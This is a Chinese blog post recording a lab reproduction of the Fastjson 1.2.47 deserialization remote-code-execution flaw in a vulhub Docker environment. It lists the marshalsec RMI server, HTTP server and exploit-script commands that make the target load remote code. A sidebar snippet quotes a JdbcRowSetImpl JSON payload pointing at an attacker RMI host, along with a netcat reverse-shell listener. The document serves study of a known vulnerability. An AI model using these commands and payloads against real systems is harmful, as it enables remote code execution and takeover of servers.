第一个docker漏洞环境搭建并复现某fastjson漏洞

最新推荐文章于 2024-06-15 00:00:00 发布
最新推荐文章于 2024-06-15 00:00:00 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 复现 文章标签: 安全 docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mukami0621/article/details/108747208
版权

docker漏洞环境搭建并复现某fastjson漏洞

补一个之前复现fastjson漏洞的记录,poc已有
1、搭建docker(mac版)
参考链接:https://www.runoob.com/docker/macos-docker-install.html
安装成功后进行初始化
在这里插入图片描述问题:发现80端口被占用
解决:https://blog.csdn.net/haha223545/article/details/105244919,是apache占用了,所以停止apache服务即可:sudo apachectl stop
在这里插入图片描述2、从git上拉取漏洞环境靶机vulhub(mac需要装好Git)
在这里插入图片描述进入后能看到有许多漏洞环境
在这里插入图片描述3、使用docker
进入对应的文件夹,使用docker-compose up
在这里插入图片描述成功启动,漏洞环境已经搭好
4、开始漏洞攻击复现
从docker中登录受害者靶机,可以查看是否有文件生成

docker ps -a:查看ID

docker exec -it ID /bin/bash

在这里插入图片描述接下来有两种方式:

1、使用另一台计算机作为攻击机和服务器端,进行攻击

2、使用docker搭建一个服务器端,本机作为攻击机(不然攻击机和受害机IP会相同)

  • 记录第一种方法实践过程:

选择同一网段下的另一个计算机,搭建服务器端

查看IP,开启python Http服务(注意要和rmi在同一文件夹下开启,不然无法访问到文件的),打开rmi服务
在这里插入图片描述
IP为10.141.x.x,攻击语句:

1、python3 -m http.server --bind 0.0.0.0 8888

2、java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://x.x.x.x:8888/#Exploit” 9999

3、python3 fastjson-1.2.47_rce.py http://s.s.s.s:8080/ rmi://x.x.x.x:9999/Exploit

其中,第一句中的8888端口和第二句中的8888,端口号可改但须一致,第二句中的9999和第三句中的9999,端口号可改但须一致,x.x.x.x为本机IP,即攻击者ip,s.s.s.s为受害者靶机Ip,端口8080需要根据靶机环境进行更改
在这里插入图片描述攻击成功后,能在受害者靶机上看到exphub文件,在http上也能看见请求,复现成功
在这里插入图片描述

mukami0621
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1296
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
Docker暴露2375端口,引起安全漏洞
02-26
我现在给大家介绍整个事情的来龙去脉,并告诉小伙伴们,怎么修复这个漏洞。为了实现集群管理,Docker提供了远程管理接口。DockerDaemon作为守护进程,运行在后台,可以执行发送到管理接口上的Docker命令。正是因为...
fastjson jar包_Fastjson<=1.2.47反序列化漏洞复现
weixin_39864373的博客
11-30 212
实验环境攻击机C:Windows 10 企业版 LTSC靶机A:CentOS8 (公网)监听主机B:Centos7(公网)项目地址:https://github.com/vulhub/vulhub该篇复现环境是fastjson1.2.47,复现手法同时适用于fastjson1.2.24,payload已在下文提供 基础环境搭建 在靶机A上安装dockercurl http...
CVE Docker逃逸漏洞复现
8888的博客
06-15 738
它允许开发者将他们的应用及其依赖包打包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,并且实现虚拟化。docker可以安装软件,也可以安装一个操作系统。需要在不同操作系统中引入一个中间层,中间层很多版本,可以在Windows、Linux、centos等等的不同操作系统之间引入一个中间层,可以用来屏蔽底层环境的差异。靶机:需要先运行一个拥有命令行的镜像比如 ubuntu:18.04 ,我们需要在进入镜像,在容器的命令行执行下载远程恶意文件,我们给他增加权限,然后执行。
Fastjson历史漏洞复现
懂进攻知防守
07-27 1398
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Fastjson 1.2.47 远程命令执行漏洞复现记录分享
qq_35361412的博客
07-16 933
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
FastJson-fastjson的简单使用(alibaba)
weixin_34146805的博客
11-16 124
原文章:http://blog.csdn.net/glarystar/article/details/6654494 原作者:张星的博客 maven配置: &lt;dependency&gt; &lt;groupId&gt;com.alibaba&lt;/groupId&gt; &lt;artifactId&gt;fastjson&lt;/artifact...
Docker AuthZ权限绕过漏洞修复,升级docker27.1.1
最新发布
07-30
docker出现了AuthZ权限绕过高危漏洞,官方发布了修复升级版本,需要二进制包进行升级
docker简单使用–docker搭建cms
01-07
docker安装命令:curl -sSL https://get.docker.com/ | sh    或 centos安装:yum -y install docker-io 运行 docker version 有结果则为安装成功 启动docker:service docker start  接下来以搭建一个cms为例,封装一个docker镜像 下载一个lamp环境:docker pull mattrayner/lamp:latest-1604 运行docker images 查看存在的docker镜像 运行该镜像:-v参数为挂载主机目录到docker镜像 docker run -dt
利用docker搭建不同版本fastjson漏洞环境【保姆级教学】
Ciyaso的博客
06-26 1539
利用docker搭建不同版本的fastjson漏洞环境
fastjson使用
yangchuanan的博客
10-08 173
转载 https://www.cnblogs.com/cdf-opensource-007/p/7106018.html fastJson对于json格式字符串的解析主要用到了一下三个类: JSON:fastJson的解析器,用于JSON格式字符串与JSON对象及javaBean之间的转换。 JSONObject:fastJson提供的json对象。 JSONArray:fastJson提...
Fastjson靶场
王嘟嘟的博客
02-14 793
花了一点时间,搞了一个Fastjson的靶场,主要目的是为了测试payload,以及方便后来者做一些练习。
fastjson-1.2.24漏洞,搭建及复现,手把手图文教程
芜湖~米汤来喽~
10-04 1432
【代码】fastjson-1.2.24漏洞,搭建及复现,手把手图文教程。
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6945
fastjson反序列化漏洞原理及利用
初识Fastjson漏洞环境搭建漏洞复现
蚁景网安学院
06-29 3150
目前网上的资源整理不是针对入门玩家,都需要一定的java漏洞调试基础,本文从一个简单的FastJson 漏洞开始,搭建漏洞环境,分析漏洞成因,使用条件等。从入门者的角度看懂并复现漏洞触发...
fastjson反序列化漏洞复现vulhub
06-01
好的,这是一个比较常见的漏洞,以下是vulhub上的fastjson反序列化漏洞复现步骤: 1. 下载并启动vulhub: ``` git clone https://github.com/vulhub/vulhub.git cd vulhub/fastjson/1.2.24_rce/ docker-compose up -d ``` 2. 打开浏览器,访问`http://your-ip:8080/`,可以看到一个输入框和一个提交按钮。 3. 在输入框中输入以下内容: ``` {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://your-ip:1099/Exploit","autoCommit":true} ``` 其中,`your-ip`需要替换为你自己的IP地址。 4. 点击提交按钮,可以看到出现了一个弹窗,表示攻击成功。 5. 在vulhub所在的机器上执行以下命令: ``` nc -lvnp 4444 ``` 6. 在攻击成功的弹窗中,点击“确认”按钮,即可成功得到一个反弹shell。 以上就是漏洞复现步骤,需要注意的是,该漏洞具有很大的危害性,攻击者可以通过该漏洞实现远程命令执行,因此需要及时修复
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值